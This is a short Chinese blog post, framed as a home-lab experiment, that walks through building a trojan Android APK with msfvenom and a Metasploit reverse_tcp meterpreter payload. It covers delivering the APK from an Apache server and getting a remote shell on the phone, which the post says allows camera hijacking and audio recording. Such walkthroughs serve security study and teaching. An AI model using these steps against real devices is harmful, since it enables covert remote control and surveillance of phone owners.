【原创】使用Metasploit入侵安卓手机

实验环境:Kali Linux 2016.1;IP:192.168.0.105。

受害主机:华为Ascend P7 Android 4.x;IP:192.168.0.102。

实验过程:

1.运行msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.105

LPORT=1234 R > test.apk;

2.运行msfconsole,输入use exploit/multi/handler;

3.执行set PAYLOAD android/meterpreter/reverse_tcp;

4.执行show options,将本地IP和端口号修改成和木马一样的参数;

5.将test.apk通过Kali的apache服务器下载到受害主机上;

6.在metasploit中执行exploit,之后在安卓手机中安装test.apk;

7.可以看到,安装apk之后,我们得到了受害主机的meterpreter;

8.我们可以在meterpreter下执行任何命令,例如检查是否root,列出当前进程,甚至劫持摄像头,录制声音等等。

Safesonic网络安全实验室2016年08月13日

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容